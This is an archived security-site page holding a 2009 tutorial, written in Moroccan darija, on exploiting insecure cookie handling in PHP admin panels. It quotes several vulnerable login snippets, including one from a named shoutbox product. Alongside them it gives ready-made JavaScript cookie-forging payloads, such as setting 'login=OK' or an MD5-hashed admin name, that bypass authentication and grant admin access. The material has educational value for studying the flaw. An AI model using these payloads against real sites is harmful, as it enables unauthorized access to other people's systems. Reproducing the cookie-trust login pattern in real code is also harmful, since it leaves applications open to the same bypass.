exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Playing With Cookies

Playing With Cookies
Posted Feb 27, 2009
Authored by Stack | Site v4-team.com

Whitepaper called Playing With Cookies (ST1). Written in Morocco darija.

tags | paper
SHA-256 | 541fa78c66c0da566d9639891ff8d89f721449423e844711b1a2cc4a9b923263

Playing With Cookies

Change Mirror Download
  |=--------------------------------------------------------------------=|
|=-------------=[ Playing with cookies (ST1) (Morocco) ]=-----------=|
|=-----------------------=[ 25 February 2009 ]=-----------------------=|
|=---------------------=[ By Mountassif Moad ]=---------------------=|
|=--------------------------------------------------------------------=|

########### Lwlad leblad o mgharba tal moute ##########
######
Info
######
###########################################################################
[+]
[+] Language : Morocco darija
[+]
[+] By : Mountassif Moad (Stack)
[+]
[+] Website : www.v4-team.com
[+]
[+] Date : 2009-02-25
[+]
[+] MilHome : http://www.milw0rm.com/author/1331
[+]
###########################################################################

##########
Mohtawayate
##########
[0x00] - Mo9adima
[0x01] - 3ard
[0x02] - khatima
[0x03] - l3azz l
[0x04] - Kridi

#######################
[0x00] - Mo9adima
#######################
salamo 3laykome lyouma darete liya flekhwa wana ngoule aji ncherho
lwlad leblad kifache nektachfo les faille diyale cookies
wli tansemiwha Insecure Cookie Handling Vulnerability
ktebte dine mo hadchi bdarija abche yfehmo liha rire wlade leblad
dinmhome hadouke l9rouda lakhrine li 3la bali w balkome
nekarine lkhire alahoma yetlaho ncherho bdarija mayfahmo fiha hta weza :d o li bgha yefheme yet3eleme darija
hhhhhh
##########
[0x01] - 3ard
##########
-----
1
-----
almohime nebdawe b te9labe fe php

code php 1 :
if ($_COOKIE["login"] == "OK")
{
header("location: admin.php");
}
else
{
echo "lekmala diyale la page php "

hna le code ti 9eleb wache lam3louma diyale
cookies kina menregistri fe l browser diyalke (login=ok)
ila l9aha kina ti douze la page admin.php o ila makanche lcookies
shihe ti kemel like la page o matatedkholche l admin
njerbo 3la mital haye
-----
2
-----
hadi : http://www.milw0rm.com/exploits/5845
telecharger mene hna : http://www.zeldaforums.net/scripts/myshoutpro1.2.zip
lmohime ndekhlo l fichier admin.php fe la ligne 37 kayne hade code

code php 2 :
<?php
$admin_cookie=$_COOKIE['admin_access'];
if($admin_cookie == "") {
?>
alor hna tanchoufo beli $admin_cookie=admin_access
o kina (if) ya3ni (ila)
$admin_cookie == "" - = - admin_access == ""
"" = aya haja ola madire wlaou
alor hiya

admin_access=0
exploit : javascript:document.cookie = "admin_access=0; path=/";
apré matexecuti lexploit radi yekhreje like message
You are logged in. Click here to proceed.
tekliki o tedkhole admin

-----
3
-----
daba ndouzo l code akhore

code php 3 :

if ($user == $username && $pass == $password){

setcookie("login", "OK", time());
hna nbaziwe 3la hade star => setcookie("login", "OK", time());

setcookie hadi function fe php ila bghito te9rawe 3liha ici http://fr.php.net/setcookie
hade function kathadede aya haja bache tsefetha l cookies
w bima ana hna kine kalimate w li homa
login & Ok
te9dere tkoune rire haka

setcookie("login", "OK")

lmohime lexploit diyale hadi hta howa sahleeb bhalha bhale li sab9o
Exploit: javascript:document.cookie = "login=OK; path=/";
----
4
----

code php 4 :

$user=$_POST['username'];
$pass=$_POST['password'];
$select_admin = mysql_query("SELECT * FROM cms_admin");
while($dati_admin=mysql_fetch_array($select_admin)){
$username=$dati_admin['username'];
$password=$dati_admin['password'];
}
if ($user == $username && $pass == $password){

setcookie("login", $username, time());

hna 9adiya chwiya mrida ncherho hade code

setcookie("login", $username, time());

hna tanlahdo beli kine motaghayire $username
hade motagahyire $username=username
weli howa diyale admin
alor bache tekhdeme lina taghra kahsna walaboda ndiro user diyale admin
matalane ila user diyale admin = administrator
alor lexploit rada tkoune hakda

Exploit: javascript:document.cookie = "login=administrator; path=/";

----
5
----

code php 5 :

ta9ribane hakda

$user=$_POST['username'];
$pass=$_POST['password'];
$select_admin = mysql_query("SELECT * FROM cms_admin");
while($dati_admin=mysql_fetch_array($select_admin)){
$username=$dati_admin['username'];
$password=$dati_admin['password'];
}
if ($user == $username && $pass == $password){

setcookie("login", md5($username), time());

hade code bhale lcode li f lexample 4
mé hna kine wahede ziyada hiya tachfire b md5
chofou m3ya hade star

setcookie("login", md5($username), time());

setcookie chrahnaha
login howa smiya li radi tsefete la function setcookie l cookies
md5($username) hadi tate3ni l username mchafere b md5
alor ila username amdin hna makanche mchafere b md5 maradiche ndekhlo l la lawha diyale admin
o lexploit rada tkoune hakda

Exploit: javascript:document.cookie = "login=200ceb26807d6bf99fd6f4f0d1ca54d4; path=/";

administrator = 200ceb26807d6bf99fd6f4f0d1ca54d4

-------------------------------------------------------------------------

#######################
[0x02] - khatima
#######################
khedma 3alam ya salam tsenawe wahede video adi ykoune zwiwene
une autre methode bache tktachfo insecure cookies
#######################
[0x03] - l3azz l
#######################
lga3 lmgharba :d
khosousane : Houssamix & simo-soft & djekmani & Gor & Simo64 & Sec-alert & issam & ana :d
limasriyine lhabayibe : darbate mi9asse haji

------[ 0x04 - kridi ]
Author: Mountassif Moad
mail: ma3adkome madiro bihe :d
site: http://v4-team.com

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close